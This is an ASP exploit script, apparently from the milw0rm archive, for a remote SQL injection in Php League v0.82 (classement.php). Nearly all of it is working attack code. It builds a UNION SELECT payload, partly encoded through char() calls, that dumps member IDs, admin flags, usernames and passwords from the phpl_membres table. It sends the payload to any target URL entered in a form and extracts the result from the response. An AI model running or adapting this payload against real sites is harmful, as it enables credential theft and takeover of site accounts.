% Response.Buffer = True %>
<% On Error Resume Next %>
<% Server.ScriptTimeout = 100 %>
<%
'===============================================================================================
'[Script Name: Php League v0.82 (classement.php) Remote SQL Injection Exploit
'[Coded by : ajann
'[Author : ajann
'[Contact : :(
'[ExploitName: exploit2.asp
'[Note : exploit file name =>exploit2.asp
'[Note : If Wrong Id = "CTYPE html PUBLIC..... see"
'[Using : Write Target and ID after Submit Click
'===============================================================================================
%>
Php League v0.82 (classement.php) Remote SQL Injection Exploit
Php Leaguev0.82 (classement.php)
Remote SQL Injection Exploit
TARGET:Example:[http://x.com/path]
USER ID:Example:[User
ID=1] |
|
<%
islem = Request.QueryString("islem")
If islem = "hata1" Then
Response.Write "There is a problem! Please complete to the whole spaces"
End If
If islem = "hata2" Then
Response.Write "There is a problem! Please right character use"
End If
If islem = "hata3" Then
Response.Write "There is a problem! Add ""http://"""
End If
%>
<%
If islem = "get" Then
string2="/consult/classement.php?champ='"
string3="%20union%20select%200,0,concat(char(85),char(115),"
string4="char(101),char(114),char(73),char(68),char(58),"
string5="id,char(32),char(65),char(100),char(109)"
string6=",char(105),char(110),char(63),char(58),admin,char(32),char(85),"
string7="char(115),char(101),char(114),char(78),char(97),char(109),"
string8="char(101),char(58),pseudo,char(32),char(80),char(97),char(115),"
string9="char(115),char(58),char(13),char(10),mot_de_passe)"
string10="%20from%20phpl_membres%20where"
string11="%20id%20like%20"
string12=Request.Form("id")
string13="/*"
targettext = Request.Form("text1")
arama=InStr(1, targettext, "union" ,1)
arama2=InStr(1, targettext, "http://" ,1)
If targettext="" Then
Response.Redirect("exploit2.asp?islem=hata1")
Else
If arama>0 then
Response.Redirect("exploit2.asp?islem=hata2")
Else
If arama2=0 then
Response.Redirect("exploit2.asp?islem=hata3")
Else
%>
<%
target1 = targettext+string2+string3+string4+string5+string6+string7+string8+string9+string10+string11+string12+string13
Public Function take(come)
Set objtake = Server.CreateObject("Microsoft.XMLHTTP" )
With objtake
.Open "GET" , come, FALSE
.sEnd
take = .Responsetext
End With
SET objtake = Nothing
End Function
get_username = take(target1)
getdata=InStr(get_username,"0 0/" )
username=Mid(get_username,getdata+5,90)
%>
ajann
<%
End If
End If
End If
End If
Set objtake = Nothing
%>
# milw0rm.com [2006-10-27]